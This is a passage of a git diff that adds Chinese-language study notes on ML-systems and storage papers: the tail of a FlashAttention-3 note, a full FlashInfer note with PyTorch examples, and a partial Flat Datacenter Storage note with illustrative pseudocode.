时,H100 上 FA3 相对 FA2 的增益最明显;**短序列或 batch 极小** 时 kernel launch 开销可能吃掉优势。 + +### 示例 2:flash-attn 包显式调用 Hopper / FP8 路径 + +训练栈常直接用 `flash_attn` 仓库的 Hopper 实现(需从源码编译,CUDA ≥ 12.3): + +```python +# pip install flash-attn --no-build-isolation +# 需 Hopper GPU + 支持 FP8 的 flash-attn 构建 +import torch +from flash_attn import flash_attn_func + +# layout: [batch, seqlen, nheads, headdim] +B, N, H, D = 2, 8192, 32, 128 +q = torch.randn(B, N, H, D, device="cuda", dtype=torch.bfloat16) +k = torch.randn(B, N, H, D, device="cuda", dtype=torch.bfloat16) +v = torch.randn(B, N, H, D, device="cuda", dtype=torch.bfloat16) + +# causal LM;Hopper 上内部走 WGMMA + TMA + 异步 softmax +out_bf16 = flash_attn_func(q, k, v, causal=True) + +# FP8 路径(若构建启用):Q/K/V 可在 kernel 内 block-quant + incoherent transform +# 具体 API 以 flash-attn 版本 README 为准,例如: +# out_fp8 = flash_attn_func(..., softcap=0.0, deterministic=False, fp8=True) + +loss = out_bf16.sum() +loss.backward() # 反向同样针对 Hopper 优化,不物化 N×N 矩阵 +``` + +与 [[flashattention-2]] 示例相同:**`[B, N, H, D]` layout** 与 SDPA 的 `[B, H, N, D]` 不同,集成时注意 transpose。 + +### 示例 3(伪代码):Hadamard incoherent processing 为何不改注意力语义 + +理解 FP8 数值路径,核心是 **正交变换在 logits 上抵消**: + +```python +import math + +def hadamard(x): + """简化示意:实际用 FWHT + 随机 sign,O(d log d)。""" + n = len(x) + h = 1 + buf = list(x) + while h < n: + for i in range(0, n, h * 2): + for j in range(i, i + h): + a, b = buf[j], buf[j + h] + buf[j], buf[j + h] = a + b, a - b + h *= 2 + return [v / math.sqrt(n) for v in buf] + +def block_fp8_quant(x, block_size=64): + """每块独立 scale → FP8;反量化后做 GEMM 示意。""" + scales = [] + q_blocks = [] + for i in range(0, len(x), block_size): + block = x[i : i + block_size] + s = max(abs(v) for v in block) / 127.0 or 1.0 + scales.append(s) + q_blocks.append([round(v / s) for v in block]) # 示意,非真实 E4M3 + return q_blocks, scales + +# incoherent:Q' = H Q, K' = H K → (Q')(K')^T = Q K^T +Q = [0.1, 0.2, 3.0, 0.15] # 含 outlier 3.0 +K = [0.12, 0.18, 0.05, 0.11] +Hq, Hk = hadamard(Q), hadamard(K) + +# 直接 quant Q 误差大;先 Hadamard 再 block quant 误差更小 +_, _ = block_fp8_quant(Q) +_, _ = block_fp8_quant(Hq) + +dot_orig = sum(Q[i] * K[i] for i in range(len(Q))) +dot_rot = sum(Hq[i] * Hk[i] for i in range(len(Hq))) +assert abs(dot_orig - dot_rot) < 1e-6 # 正交不变性 +``` + +FA3 在 kernel 内把 **FWHT + block FP8 quant + WGMMA + FP32 softmax 累加** 融成一条流水线,避免把 FP8 Q/K 写回 HBM。 + +--- + +## FlashAttention-2 vs FlashAttention-3 对照 + +| 维度 | FlashAttention-2 | FlashAttention-3 | +|------|------------------|------------------| +| 目标 GPU | Ampere / Ada(A100, RTX 40) | **Hopper(H100)** | +| 核心指令 | `mma.sync` | **WGMMA + TMA** | +| 并行哲学 | split-Q、序列维 thread block | **warp specialization + 异步流水** | +| Softmax | 减少 rescale 次数 | **与 GEMM ping-pong / pipeline overlap** | +| 精度 | FP16 / BF16 为主 | **+ FP8 Tensor Core 路径** | +| 数值技巧 | FP32 累加 softmax | **+ block quant + Hadamard incoherent** | +| H100 利用率 | ~35% | **~75%(FP16)** | +| 相对 FA2 加速 | 1× | **1.5–2.0×** | + +数学上仍是 **exact attention**(在声明的 dtype 下),不是 FlashAttention 以外的近似算法。 + +--- + +## 踩过的坑 + +1. **硬件门槛**:FA3 依赖 sm_90;A100 上请继续用 FA2,**不要假设 pip install 就有 FA3**。 +2. **CUDA / 驱动版本**:Hopper + FP8 常要求较新 CUDA(12.x+)与对应 `flash-attn` 编译选项。 +3. **FP8 不是「免费 2×」**:因果 mask、head_dim=256 等场景 FP8 可能 **略慢于或持平 FP16**;需 profile 你的 (B, H, N, D)。 +4. **outlier 依赖**:incoherent processing 对 **严重 outlier 激活** 帮助最大;分布很均匀时 FP8 增益主要是吞吐而非误差。 +5. **与 FA2 相同的 head_dim 限制**:非 8 倍数、过大 head_dim 可能无法 dispatch。 +6. **生态集成滞后**:论文 2024 年中发布;PyTorch 内置 dispatch 随版本迭代——生产环境 **查 `torch.backends.cuda` 与 flash-attn release note**。 + +--- + +## 适用 vs 不适用 + +**适用**: + +- H100 / H800 集群上 **长上下文** LLM 训练或推理 +- 需要 **exact attention** 且希望吃满 Hopper +- 探索 **FP8 训练** 且关心 attention 层数值稳定性 +- 与 PyTorch SDPA、`flash_attn`、cuDNN 9 等栈对比选型 + +**不适用**: + +- Ampere / AMD / Apple Silicon(无 WGMMA/TMA) +- 极短序列(N 很小)——异步流水 overhead 不划算 +- 必须自定义 attention 变体且无法进官方 kernel(考虑 Triton,见 [[triton-llm]]) +- 可接受近似 attention(Performer 等)换复杂度——那是算法路线,不是 FA3 目标 + +--- + +## 与相关工作的位置 + +```text +Attention 瓶颈 + ├── 改算法: Performer, [[mamba]] … + └── 精确 attention + 系统优化: + FlashAttention-1 → IO-aware, O(N) 显存 + FlashAttention-2 → Ampere 并行, ~2× ← [[flashattention-2]] + FlashAttention-3 → Hopper 异步 + FP8 ← 本篇 + PagedAttention → KV 分页 [[paged-attention-vllm]] + cuDNN 9 / ThunderKittens → 同代 Hopper 竞争实现 +``` + +--- + +## 历史小故事(可跳过) + +- **2022–2023**:FA1/FA2 把 LLM context 从 4K 推到 128K+ 的训练/推理成为可能。 +- **2024 年 7 月**:Tri Dao 发布 FA3 预印本与 blog,同日强调 **开源代码**。 +- **NeurIPS 2024**:正式收录;BF16/FP8 峰值数字在 camera-ready 中进一步更新。 +- **PyTorch 官方 blog** 预告 FA3 将集成进未来 PyTorch release——与 [[flashattention-2]] 进 SDPA 的路径类似。 + +Tri Dao 连续三代 attention kernel 说明:**同一数学问题,随硬件代际可反复做 MLSys 深度优化**——Hopper 的「异步」比 Ampere 的「并行划分」又深一层。 + +--- + +## 学到什么 + +1. **新硬件 ≠ 旧程序变快**:H100 上 FA2 仅 35% 利用率;必须用 **WGMMA/TMA 重写数据流**。 +2. **Attention 的隐形瓶颈是 exp**:matmul 越快,softmax 占比越高——**overlap 是第三代的核心**。 +3. **低精度是系统问题**:FP8 要快,既要 **Tensor Core layout**,也要 **块量化 + 正交预处理** 控误差。 +4. **正交变换是可融合的自由午餐**:Hadamard + RoPE 同属 memory-bound,incohere processing 几乎不单独付带宽税。 +5. **读 roofline 要分单元**:Tensor Core TFLOPs 和 special function TFLOPs 是 **两张不同的 roofline**。 + +--- + +## 延伸阅读 + +- 论文:[arXiv:2407.08608](https://arxiv.org/abs/2407.08608) +- 作者博客:[FlashAttention-3 | Tri Dao](https://tridao.me/blog/2024/flash3/) +- PyTorch 解读:[FlashAttention-3 – PyTorch Blog](https://pytorch.org/blog/flashattention-3/) +- 代码:[Dao-AILab/flash-attention](https://github.com/Dao-AILab/flash-attention) +- 前置:[[flash-attention]](v1)、[[flashattention-2]](v2) +- 推理互补:[[paged-attention-vllm]] +- 基础:[[attention]] + +## 关联 + +- [[flashattention-2]] —— 上一代:Ampere 并行与工作划分 +- [[flash-attention]] —— 第一代:IO-aware tiling 与 online softmax +- [[attention]] —— FA3 优化的核心算子 +- [[paged-attention-vllm]] —— KV cache 分页,与 FA3 正交 +- [[flashattention-2]] —— H100 上 FA2 仅 ~35% 利用率的对照基线 +- [[triton-llm]] —— 自定义 attention 变体的常见框架 +- [[gpt-3]] —— 长上下文需求推动 FlashAttention 系列演进 diff --git a/src/content/docs/papers/flashinfer-2024.md b/src/content/docs/papers/flashinfer-2024.md new file mode 100644 index 000000000..64d779cb8 --- /dev/null +++ b/src/content/docs/papers/flashinfer-2024.md @@ -0,0 +1,334 @@ +--- +title: FlashInfer — LLM 推理的「万能 attention 引擎」零基础笔记 +来源: https://arxiv.org/abs/2501.01005 +日期: 2026-06-13 +子分类: ml +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:外卖平台的「中央厨房 + 现炒档口」 + +想象你经营一家**大型外卖平台**(LLM 推理服务),同时接很多订单: + +- 有的顾客要**整桌宴席**(prefill:一次吃进几千 token 的长 prompt); +- 有的只要**加一道菜**(decode:每步只生成 1 个 token,但要回头翻整本菜谱); +- 有的订单**开头完全一样**(共享 system prompt / RAG 文档前缀); +- 有的走**猜菜再确认**流程(speculative decoding:先草稿、再并行验证)。 + +厨房如果只备**一种灶台**、**一种切菜规则**,要么宴席档口闲着、要么快餐档口排队——这就是早期 LLM serving 里 attention kernel 的困境:**每个框架(vLLM、SGLang、MLC)各自写一套 CUDA,维护成本高,还吃不满 GPU**。 + +**FlashInfer**(Ye 等,MLSys 2025,arXiv [2501.01005](https://arxiv.org/abs/2501.01005))的做法像建一座**中央厨房基础设施**: + +1. **统一食材摆放标准**(block-sparse KV cache 格式)——分页表、Radix 树、树形 speculative mask,都能映射成同一种「块稀疏矩阵」; +2. **现炒档口按订单定制**(JIT 编译 attention 变体)——滑动窗口、logit soft-cap、FlashSigmoid 等,不必为每种变体手写全套 kernel; +3. **调度员动态分锅**(负载均衡调度)——batch 里谁长谁短随时变,仍尽量让每个 SM 都有活干,且能和 **CUDA Graph**(要求静态配置)和平共处。 + +一句话:**FlashInfer 不是又一个 FlashAttention,而是把「推理场景里所有 attention 怎么存、怎么算、怎么调度」收成一套可定制、可生成的引擎**——已被 vLLM、SGLang、MLC-Engine、TensorRT-LLM 等集成。 + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 论文 | *FlashInfer: Efficient and Customizable Attention Engine for LLM Inference Serving* | +| 作者 | Zihao Ye, Lequn Chen, Ruihang Lai, Wuwei Lin 等(UW / CMU / NVIDIA 等) | +| 会议 | MLSys 2025 | +| 开源 | [github.com/flashinfer-ai/flashinfer](https://github.com/flashinfer-ai/flashinfer) | +| 定位 | **推理专用** attention kernel 库 + **代码生成 / JIT** 引擎 | +| 效果(论文) | 相对编译器后端:**29–69%** 词间延迟下降;长上下文:**28–30%**;并行生成:**13–17%** 加速 | + +论文要解决的核心矛盾: + +- **工作负载多样**:prefill、decode、增量 prefill、prefix 共享、speculative 树 attention…… +- **硬件与格式多样**:PagedAttention、RadixAttention、GQA/MQA、不同 GPU 架构(Turing → Blackwell)、不同 mask / score 变体。 + +过去每个 serving 框架各写一套 kernel → 重复劳动、难以跟上新模型特性。FlashInfer 用 **「统一数据抽象 + 模板 JIT + 动态调度」** 把维护面收成一层。 + +--- + +## 为什么重要 + +不理解 FlashInfer,下面几件事很难串起来: + +- 为什么 **vLLM / SGLang** 近年把 attention 底层迁到 FlashInfer,而不只依赖 FlashAttention-2 单体库 +- 为什么 **PagedAttention**(块表)和 **RadixAttention**(前缀树)在实现上可以共用同一套 kernel 接口 +- 为什么推理要单独谈 **decode tile size = 1**、**prefill tile size = 128**——训练 kernel 直接搬过来会慢 +- 为什么 **CUDA Graph** 能显著降延迟,却又和「动态 batch、变长序列」冲突——FlashInfer 的调度是为这个张力设计的 +- 为什么新模型一出 **sliding window、MLA、logit soft-cap**,框架能快速跟上是 JIT 变体在起作用 + +它和 **FlashAttention** 的关系:FlashAttention 优化的是「单次 attention 的 IO」;FlashInfer 站在 **serving 系统** 视角,把 KV 怎么摆、batch 怎么切、变体怎么编译、SM 怎么分活,一起解决。 + +--- + +## 核心概念 + +### 1. Block-Sparse Row(BSR)统一 KV 存储 + +KV cache 在 serving 里往往不是连续大数组: + +- **PagedAttention**:逻辑块 → 物理块,通过 page table 索引; +- **RadixAttention**:共享前缀在树上复用物理块; +- **Speculative decoding**:树形 attention mask。 + +FlashInfer 证明:这些都能看成 **块稀疏矩阵(BSR)**: + +- 行块大小 \(B_r\):通常对齐 **query tile**(一次几个 query 一起算); +- 列块大小 \(B_c\):由 KV 管理策略决定(常为 1 个 token 一块,或更大块)。 + +非零块 = 真正要读的 KV 页;零块直接跳过。这样 **一种 kernel 读写逻辑** 就能覆盖多种 serving 内存布局。 + +### 2. Composable Formats(可组合格式) + +同一 batch 里,不同请求对 KV 的访问模式不同: + +- 共享前缀部分:多行 query 读**同一段** KV → 适合大 \(B_r\),在 shared memory 里复用; +- 各自后缀部分:每行独立 → 适合 \(B_r=1\)。 + +FlashInfer 把 KV **拆成多个 BSR 子矩阵**(不必搬数据,只拆 index),分别用最优块大小计算,再用 **Attention State 组合**(见下)合并结果——类似「大锅炖公共汤底 + 小炒锅炒个性配菜」。 + +### 3. Attention State 与 \(\oplus\) 组合算子 + +来自 online softmax / Flash-Decoding 思想:attention 不必一次算完,可以分块算 **局部状态**,再合并。 + +对每个 index 集合 \(\mathcal{I}\),保存二元组: + +- \(\mathbf{LSE}(\mathcal{I})\):log-sum-exp of scores(logits 的「归一化分母」的对数形式); +- \(\mathbf{O}(\mathcal{I})\):加权 value 输出。 + +两块 \(\mathcal{I}, \mathcal{J}\) 的结果用 \(\oplus\) 合并(与 FlashAttention 的 online softmax 更新同源)。**可结合、可交换** → 适合: + +- 长 KV 分 chunk 并行; +- composable format 多子矩阵; +- cascade / 分层 KV。 + +FlashInfer 把 **Attention State** 当作 attention op 的标准输出类型(类似 GEMM 里的累加器)。 + +### 4. 多 Tile 尺寸 + 架构感知模板 + +训练向 prefill 优化,推理还要照顾 **decode(\(l_{qo}=1\))**: + +- query tile \(T_q \in \{1,16,32,64,128\}\); +- KV tile 多种组合; +- \(T_q=1\) 走 **CUDA Core**(tensor core 最小行宽 16,单 token decode 用不上); +- Hopper 上 FA3 路径用 WGMMA,tile 为 64 的倍数。 + +根据 **平均 query 长度、寄存器/共享内存预算、SM 占用率** 启发式选 tile——同一套模板,编译期定参数。 + +### 5. JIT 可定制 Attention 变体 + +维护「每个模型一种手写 CUDA」不可持续。FlashInfer 提供 **变体规约(variant specification)**,用户用 CUDA 片段定义 functor: + +| Functor | 作用 | +|---------|------| +| `QueryTransform` / `KeyTransform` / `ValueTransform` | 算分前对 Q/K/V 变换(可融合 RoPE、RMSNorm) | +| `LogitsTransform` / `LogitsMask` | softmax 前改 logits(滑动窗口、soft-cap) | +| `OutputTransform` | 输出后处理 | + +JIT 把变体 **填进 FlashAttention 骨架模板**,PyTorch extension 编译注册为 custom op。灵感来自 **FlexAttention**,但面向 **推理 serving + block-sparse KV**。 + +### 6. 负载均衡调度 + CUDA Graph 兼容 + +Serving batch 里每个请求的 \(l_{qo}, l_{kv}\) 时刻在变。FlashInfer 运行时: + +1. 按 query tile \(T_q\) 切 tile,估算每 tile 代价 \(\text{cost} = \alpha l_q + \beta l_{kv}\); +2. 把 KV 再切成 chunk,**贪心 / 优先队列** 分给各 CTA,平衡 SM 负载; +3. **编译期** 定 tile 配置,**运行期** 只喂序列长度——满足 CUDA Graph「图结构静态、张量地址固定」的要求。 + +受 **Stream-K** 启发,但 **不用原子累加**(避免非确定性输出,serving 要可复现)。 + +### 7. 与 FlashAttention-2/3 的分工 + +| 层次 | FlashAttention | FlashInfer | +|------|----------------|------------| +| 主要场景 | 训练 / 通用前向 | **LLM inference serving** | +| KV 布局 | 多为稠密或简单 mask | **Paged / Radix / 树 / 稀疏** 统一 BSR | +| 变体扩展 | 相对固定 | **JIT 模板** | +| 调度 | 较少涉及 batch 动态 | **CTA 级负载均衡** | +| 集成 | PyTorch SDPA 后端 | vLLM、SGLang、MLC 等 **引擎内核** | + +FlashInfer 内部可选用 FA2(Ampere 及以前)或 FA3(Hopper)作为微内核,外面再包 serving 语义。 + +--- + +## 代码示例 + +### 示例 1:单请求 decode — `single_decode_with_kv_cache` + +最基础的推理形态:query 只有 **当前 1 个 token**,KV 是历史 cache。 + +```python +import torch +import flashinfer + +# q: [num_qo_heads, head_dim] — decode 时通常只有 1 个 query token +# k, v: [kv_len, num_kv_heads, head_dim] — 历史 KV(或本步 append 前) +q = torch.randn(32, 128, device="cuda", dtype=torch.float16) +k = torch.randn(2048, 32, 128, device="cuda", dtype=torch.float16) +v = torch.randn(2048, 32, 128, device="cuda", dtype=torch.float16) + +output = flashinfer.single_decode_with_kv_cache(q, k, v) +# output.shape == q.shape +``` + +对比朴素 PyTorch attention,FlashInfer 在 **小 query、长 KV** 的 decode regime 下用对 tile 与内存访问模式,这正是 serving 里占大头的路径。 + +### 示例 2:Paged KV batch decode — `BatchDecodeWithPagedKVCacheWrapper` + +与 **vLLM PagedAttention** 同构:每个序列的 KV 存在 **非连续物理块** 里,用 `indptr` / `indices` 描述块表。 + +```python +import torch +import flashinfer + +num_layers = 32 +num_heads = 32 +head_dim = 128 +page_size = 16 # 每块存 16 个 token 的 KV +max_num_pages = 1024 +batch_size = 8 + +# 物理 KV 池:[num_pages, 2, page_size, num_heads, head_dim](2 = K 与 V) +kv_cache = torch.randn( + max_num_pages, 2, page_size, num_heads, head_dim, + device="cuda", dtype=torch.float16, +) + +# 块表:indptr 长度 batch+1,indices 列出每个序列占用的物理页号 +kv_page_indptr = torch.tensor( + [0, 3, 5, 8, 10, 12, 15, 18, 20], device="cuda", dtype=torch.int32 +) +kv_page_indices = torch.randint( + 0, max_num_pages, (20,), device="cuda", dtype=torch.int32 +) +# 每个序列最后一页用了几个 slot(未满页) +kv_last_page_len = torch.tensor( + [16, 8, 12, 16, 4, 16, 10, 16], device="cuda", dtype=torch.int32 +) + +# 当前步要 attend 的 query:[batch, num_heads, head_dim] +q = torch.randn(batch_size, num_heads, head_dim, device="cuda", dtype=torch.float16) + +wrapper = flashinfer.BatchDecodeWithPagedKVCacheWrapper( + torch.empty(128 * 1024 * 1024, dtype=torch.uint8, device="cuda") # workspace +) +wrapper.plan( + kv_page_indptr, kv_page_indices, kv_last_page_len, + num_heads, num_heads, head_dim, page_size, causal=True, +) +output = wrapper.run(q, kv_cache) +``` + +`plan()` 阶段根据 batch 的序列长度做 **调度与 tile 选择**;`run()` 执行 kernel。同一 `plan` 可配合 **CUDA Graph 捕获**,降低每 token 的 CPU launch 开销——这是论文强调的工程点。 + +### 示例 3(补充):prefill + decode 混合 — POD-Attention 思路 + +生产 batch 常 **prefill 与 decode 混在同一 forward**。FlashInfer 提供 **POD-Attention** 等融合路径,避免为两类请求各跑一遍完整 kernel 流水线。概念上: + +```python +# 伪代码:同一 batch 内 ragged Q,BSR 格式 KV,一次 launch 覆盖多 phase +# flashinfer 高层 API 随版本演进,核心是「ragged query + block-sparse KV」统一入口 +outputs, lse = flashinfer.prefill_with_paged_kv_cache( + q_ragged, kv_cache, kv_page_indptr, kv_page_indices, kv_last_page_len, + causal=True, +) +``` + +具体函数名以 [docs.flashinfer.ai](https://docs.flashinfer.ai) 为准;论文贡献在于 **数据结构与调度** 支持这种混合,而非单一函数名。 + +--- + +## 论文实验结果(精读摘要) + +| 场景 | 对比对象 | 主要结论 | +|------|----------|----------| +| LLM serving benchmark | 编译器类后端(如 torch.compile 路径) | 词间延迟 **↓29–69%** | +| 长上下文推理 | 同类 serving 方案 | 延迟 **↓28–30%** | +| Parallel generation(beam / 多分支) | 基线引擎 | **13–17%** 端到端加速 | +| Kernel micro-benchmark | FlashAttention-2、xformers 等 | 多配置下吞吐领先或持平,优势在 **异构 batch + paged KV** | + +评估覆盖 **kernel 级** 与 **端到端 serving**;集成框架包括 vLLM、SGLang、MLC-Engine。 + +--- + +## 与相关工作的关系 + +```text +FlashAttention (IO-aware 精确 attention) + ↓ 微内核算法 +FlashInfer (serving 层:BSR KV + JIT 变体 + 调度) + ↓ 被集成 +vLLM (PagedAttention) / SGLang (RadixAttention) / MLC-Engine / TensorRT-LLM +``` + +- **[PagedAttention / vLLM](paged-attention-vllm.md)**:解决 KV **怎么分页**;FlashInfer 解决 **分页后 attention 怎么快算**。 +- **[SGLang / RadixAttention](sglang-radixattention.md)**:解决前缀 **怎么共享**;FlashInfer 用 composable BSR **吃共享前缀**。 +- **FlashAttention-2/3**:单算子极致;FlashInfer **包一层 serving 语义** 并 JIT 变体。 +- **FlexAttention**:训练侧灵活 mask;FlashInfer 把类似 **functor** 思想带到 **CUDA JIT + 推理 KV**。 + +--- + +## 安装与验证(工程向) + +```bash +pip install flashinfer-python +# 可选:预编译 cubin / jit-cache,减少首次编译等待 +pip install flashinfer-cubin +pip install flashinfer-jit-cache --index-url https://flashinfer.ai/whl/cu129 + +flashinfer show-config # 确认 CUDA arch、缓存路径 +``` + +支持 GPU:SM75(Turing)至 Blackwell;CUDA 12.6+。日志调试:`FLASHINFER_LOGLEVEL=3`。 + +--- + +## 局限与后续方向(论文自述) + +- 更高层 DSL(如 TensorIR 类)编译到 FlashInfer 规约,降低手写 functor 成本; +- 更多后端(Triton、其他厂商 NPU)的代码生成; +- 新 attention(MLA、FP8/FP4 KV)需持续扩展模板与调度启发式。 + +--- + +## 自测题 + +1. 为什么 PagedAttention 的 page table 可以看成 BSR 稀疏矩阵?\(B_c=1\) 时列块代表什么? +2. decode 阶段为什么常用 \(T_q=1\) 的 tile,且走 CUDA Core 而非 Tensor Core? +3. Attention State 的 \(\oplus\) 运算解决了什么问题?和 online softmax 有何联系? +4. FlashInfer 如何在「动态序列长度」与「CUDA Graph 静态图」之间折中? +5. 若两个请求共享 4k token 前缀,composable format 如何减少重复 KV 读取? + +
+参考答案(要点) + +1. 每个物理 KV 块是 \((H,D)\) 张量;page table 指出哪些块被访问 → 非零块;\(B_c=1\) 时常对应 **每列一块 token** 的细粒度 paging。 +2. decode 每次只有 1 个 query token,用大 query tile 浪费;Tensor Core 最小行 16,单 token 不适配。 +3. 分块算 attention 后 **确定性合并** 局部结果;\(\oplus\) 等价于分段 online softmax 的合并公式。 +4. **编译期** 固定 tile / kernel 配置;**运行期** 只变序列长度与调度映射;图结构不变。 +5. 共享前缀对应稠密子矩阵,用大 \(B_r\) 存 BSR,多 query 在 shared memory 共读一段 KV;独有后缀用小 \(B_r\) 分开算再 \(\oplus\) 合并。 + +
+ +--- + +## 延伸阅读 + +- 论文 PDF:[arXiv:2501.01005](https://arxiv.org/abs/2501.01005) +- 官方文档:[docs.flashinfer.ai](https://docs.flashinfer.ai) +- 本库笔记:[FlashAttention](flash-attention.md)、[PagedAttention / vLLM](paged-attention-vllm.md)、[SGLang / RadixAttention](sglang-radixattention.md) + +--- + +## 引用 + +```bibtex +@article{ye2025flashinfer, + title = {FlashInfer: Efficient and Customizable Attention Engine for LLM Inference Serving}, + author = {Ye, Zihao and Chen, Lequn and Lai, Ruihang and others}, + journal = {arXiv preprint arXiv:2501.01005}, + year = {2025}, + url = {https://arxiv.org/abs/2501.01005} +} +``` diff --git a/src/content/docs/papers/flat-datacenter-storage.md b/src/content/docs/papers/flat-datacenter-storage.md new file mode 100644 index 000000000..3b8f6b11d --- /dev/null +++ b/src/content/docs/papers/flat-datacenter-storage.md @@ -0,0 +1,246 @@ +--- +title: Flat Datacenter Storage +来源: https://www.usenix.org/conference/osdi12/technical-sessions/presentation/nightingale +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# Flat Datacenter Storage — 零基础学习笔记 + +## 一、一句话概括 + +FDS 是微软研究院在 2012 年 OSDI 上发表的一种**数据中心级别的大对象(blob)存储系统**,它的核心理念是:利用现代数据中心的"全二分带宽"网络,让**每一块硬盘都能同时参与读写**,从而彻底放弃传统存储系统中"按数据局部性做优化"的思路。 + +--- + +## 二、从日常类比开始 + +### 2.1 传统存储:快递分拣中心 + +想象一个大型快递分拣中心: + +- 有 100 辆卡车(对应 100 台服务器上的磁盘) +- 每辆卡车的载货量有限 +- 如果要把 1 万个包裹运走,传统做法是:**把包裹按区域分组**,每组分配给几辆卡车,一组运完再运下一组 +- 这叫"局部性优化"——只让部分卡车同时工作,因为担心其他卡车抢道路 + +**问题是什么?** 90% 的时间里,只有 10-20 辆卡车在跑,其余 80 辆在等。 + +### 2.2 FDS 的做法:全部卡车同时出发 + +FDS 的思路完全不同: + +- 数据中心的网络就像一条**超宽高速公路**——全二分带宽(full bisection bandwidth),意味着任意两台服务器之间都能同时以满速通信 +- 于是 FDS 让**所有 100 辆卡车同时出发**,每辆车只装一小部分包裹 +- 通过智能的流量控制(flow control),确保高速公路不会堵车 + +**类比映射:** + +| 快递中心 | FDS 系统 | +|----------|----------| +| 卡车 | 集群中的磁盘 | +| 包裹 | 数据分片(chunk) | +| 高速公路 | 全二分带宽网络 | +| 交通管制 | Flow control | +| 分拣规则 | 元数据条带化(metadata striping) | + +--- + +## 三、核心概念拆解 + +### 3.1 Blob Store(大对象存储) + +FDS 不存关系型数据库那种"行和列",它存的是**blob**——就是一整块二进制数据,比如: + +- 一个 4GB 的视频文件 +- 一份 2GB 的日志文件 +- 一张 1GB 的图像 + +你可以把 blob 理解为"一个大包裹",它可能被拆成很多小块存在不同磁盘上。 + +### 3.2 数据条带化(Data Striping) + +一个 blob 太大时,FDS 把它切成固定大小的小块(chunk),然后**均匀分散到所有磁盘上**。 + +``` +Blob "video_4gb.mp4" = 4096 chunks (每个 1MB) + +Chunk 0 → Disk_A:Slot_3 +Chunk 1 → Disk_B:Slot_7 +Chunk 2 → Disk_C:Slot_1 +... +Chunk 4095 → Disk_Z:Slot_12 +``` + +这样读一个 blob 时,**所有磁盘可以同时读取各自的那一块**,速度 = 单盘速度 × 磁盘数。 + +### 3.3 元数据条带化(Metadata Striping) + +传统系统里,管理"哪个 chunk 存在哪"的元数据往往集中在一个节点上,成了瓶颈。FDS 把元数据也**分散到所有机器上**,每台机器只负责一部分 chunk 的位置信息。 + +### 3.4 Flow Control(流量控制) + +让所有磁盘同时读写,最大的风险是网络拥塞。FDS 内置了精细的流量控制机制,动态调节每个磁盘的读写速率,确保网络不超载。 + +### 3.5 局部性无关(Locality-Oblivious) + +这是 FDS 最反直觉的设计哲学: + +- 传统系统:尽量把相关数据放在同一台机器上,减少网络传输 +- FDS 的做法:**不在乎数据在哪**,因为网络足够快,直接从所有磁盘并行取数据反而更快 + +--- + +## 四、关键性能数据 + +| 指标 | 数值 | 说明 | +|------|------|------| +| 单进程读写吞吐 | > 2 GB/s | 远超传统存储系统 | +| 单磁盘故障恢复 | 92 GB 数据在 6.2 秒内恢复 | 磁盘间全带宽通信 | +| 整机故障恢复 | 655 GB 数据在 33.7 秒内恢复 | 整台机器挂了也不怕 | +| 排序世界纪录 | 2012 年 disk-to-disk 排序 | FDS 应用实例 | + +--- + +## 五、代码示例 + +### 5.1 示例一:写入一个 Blob + +下面的伪代码展示了如何将一个大文件写入 FDS: + +```python +# 假设我们已经连接到了 FDS 客户端 + +# 第一步:打开一个写入通道 +blob_handle = fds.open("my_video.mp4", mode="write") + +# 第二步:FDS 内部会自动做以下事情: +# 1. 把文件切成固定大小的 chunks(比如每 chunk 64MB) +# 2. 通过元数据条带化,决定每个 chunk 存在哪台机器的哪个磁盘上 +# 3. 所有磁盘同时接收各自的 chunk 数据 + +# 第三步:写入数据(FDS 自动处理分片和路由) +with open("local_video.mp4", "rb") as f: + while True: + chunk = f.read(64 * 1024 * 1024) # 64MB + if not chunk: + break + blob_handle.write(chunk) + +# 第四步:关闭,FDS 确保所有 chunk 都已持久化 +blob_handle.close() + +# 整个过程看起来像写单个文件, +# 但实际上数据被并行写入了集群中所有的磁盘 +``` + +**关键点:** 你写的代码和写本地文件一样简单,但 FDS 在背后做了: +1. 数据切分(striping) +2. 元数据路由(metadata striping) +3. 流量控制(flow control) +4. 容错复制(replication) + +### 5.2 示例二:磁盘故障后的自动恢复 + +```python +# 假设 Disk_C 突然坏了,上面有 3 个 chunk 的数据丢失 + +# FDS 检测到故障后,自动触发恢复流程: + +# 第一步:FDS 知道这 3 个 chunk 在其他磁盘上有副本 +# (通常采用 3 副本策略,即每个 chunk 存 3 份) + +# 第二步:FDS 并行从所有健康的副本磁盘读取数据 +# 注意:这里不是从一台机器读,而是从多台机器的多个磁盘同时读 + +recovery_chunks = [ + fds.read_chunk_from("Disk_A", chunk_id=1024), + fds.read_chunk_from("Disk_E", chunk_id=1025), + fds.read_chunk_from("Disk_G", chunk_id=1026), +] + +# 第三步:通过全带宽网络快速写入到新磁盘 +fds.write_to_new_disk(recovery_chunks, target="Disk_C_new") + +# 性能对比: +# 传统系统:从 1 台机器恢复 92GB → 可能需要几分钟 +# FDS:从 N 台机器并行恢复 92GB → 实测 6.2 秒 +``` + +**为什么这么快?** 因为 FDS 让磁盘之间直接通信,不经过中央服务器中转,充分利用了集群的总带宽。 + +--- + +## 六、与传统系统的架构对比 + +``` +【传统 HDFS 式存储】 + + Client ──┬── NameNode(元数据集中管理,单点瓶颈) + │ + ├── DataNode1 ── [disk, disk, disk] + ├── DataNode2 ── [disk, disk, disk] + └── DataNode3 ── [disk, disk, disk] + + 问题:NameNode 是瓶颈;数据读取受限于单台 DataNode 的磁盘数; + 恢复时数据从单台机器流出,速度慢。 + + +【FDS 式存储】 + + Client ──────────────────────────────────────┐ + │ + ┌───────────────────────────────────┼───────────────────────────────────┐ + │ ▼ │ + [MetaNode1] [MetaNode2] [MetaNode3] ... [MetaNodeN] │ + (元数据分散) (元数据分散) (元数据分散) (元数据分散) │ + │ │ │ + └───────────────┬───────────────────┘ │ + │ 全二分带宽网络(所有节点互连) │ + ▼ │ + ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐ + │Disk 1 │ │Disk 2 │ │Disk 3 │ │Disk 4 │ │Disk 5 │ │Disk 6 │ + │(本地) │ │(本地) │ │(本地) │ │(本地) │ │(本地) │ │(本地) │ + └────────┘ └────────┘ └────────┘ └────────┘ └────────┘ └────────┘ + ▲ ▲ ▲ ▲ ▲ ▲ + └───────────┴───────────┴───────────┴───────────┴───────────┘ + 所有磁盘可同时读写 + + 